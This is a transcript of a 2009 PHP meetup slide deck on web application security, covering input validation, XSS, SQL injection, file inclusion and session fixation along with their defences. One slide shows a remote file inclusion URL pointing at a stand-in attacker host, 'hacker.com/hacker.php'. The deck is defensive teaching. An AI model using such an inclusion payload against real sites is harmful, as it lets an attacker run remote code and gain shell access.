Security In PHP Applications

Security in PHP Applications By: Aditya Mooley Nagpur PHP Meetup August'09

Who Am I?
Aditya Mooley ( [email_address] )
Zend Certified PHP 5 Engineer
Working with SANIsoft Technologies since last 6 years
Opensource contributor
Writing secure web applications

We will discuss ...
Why Secure
What to Secure
How to Secure

Why secure?
PHP is widely used programming language for web
Used by individuals as well as corporates
Handles lot of critical and sensitive information
Malicious users can misuse this information if they get access to it

Secure what?
Secure code
Secure database
Secure web server

How to secure
Follow some basic guidelines
register_globals is biggest evil. It must be off.
Don't use $_REQUEST. Use individual super globals instead.
Follow Thumb Rule -
Filter input
Escape output

Security Issues
Input validation
Cross site scripting
SQL Injection
File inclusion
Session fixation
and lot more ...

Input Validation
Don't trust your users
Check every data coming from user
Use built-in PHP functions like -
is_int, is_string, is_bool, etc.
ctype_* category of functions
Whitelist over blacklist
Check data for what is allowed instead of what is not allowed

Cross site scripting (XSS)
XSS is a situation where an attacker can inject a nicely crafted HTML string which when executed on client browser can cause unexpected results.
This may lead to -
Session take over.
Setting malicious cookies
Access to restricted area

XSS ...
Let's see an example
XSS can be prevented by
escaping the data with – htmlentities() or htmlspecialchars()
Filtering out the HTML tags with strip_tags()

SQL Injection
Code injection technique to exploit the vulnerability in SQL statements in code.
Can lead to -
Removal of data
Access to critical information like passwords
Can cause due to -
Incorrect filtering of escape characters
Incorrect type handling

SQL Injection ...
Example1 , Example2
SQL injection can be prevented by -
mysql_real_escape_string() and similar functions
Typecasting data properly before passing to SQL
Using Prepared Statements (MySQLi/PDO)

File Inclusion
A technique by which an attacker can include a file from remote location or from same server which is not intended for general users
Attacker can get shell access to the server which can be used to any extent.
Such attacks can be prevented by properly filtering the input data before using it in include statement.

File Inclusion ...
Remote File Inclusion
http://mysite.com/index.php?page=http://hacker.com/hacker.php
Local File Inclusion
Attacker can send a relative path which can include a secret file on webserver even out of webroot.
Example .

Session Fixation
Through this technique, attacker can get access to the valid session of a user.
After this, there is no way for the website to differentiate between the two.
Attacker can perform all the actions that are allowed to the original user.
Example .

Session Fixation ...
Session hijacking can be prevented by generating a new session id everytime a user logs in.
This can be done with session_regenerate_id()
For extra security disable the ini setting session.use_trans_sid

Much more
Web applications can be exploited by numerous other ways.
Refer -
http://www.phpwact.org/security/risk/catalog
http://www.phpwact.org/security/attack/catalog

References
http://www.php.net
http://en.wikipedia.org
http://www.phpwact.org

Examples used in this presention can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

Thanks

Security In PHP Applications

by Aditya Mooley on Aug 10, 2009

Accessibility

Categories

Tags

Upload Details

Usage Rights

2 Embeds 7

Statistics

Security In PHP Applications — Presentation Transcript

http://www.slideshare.net	6
http://lamp.jiecn.net	1